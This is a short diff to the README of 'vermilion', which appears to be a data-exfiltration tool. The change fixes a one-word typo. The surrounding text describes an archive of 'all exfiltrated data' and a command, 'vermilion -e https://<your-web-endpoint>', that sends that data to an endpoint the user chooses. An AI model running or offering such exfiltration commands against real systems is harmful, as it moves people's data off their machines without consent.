R3DRUN3/vermilion/docs/README.md

 The archive contains all exfiltrated data.

-If you want to specify and endpoint for exfiltration run:
+If you want to specify an endpoint for exfiltration run:
 ```console
 vermilion -e https://<your-web-endpoint>
 ```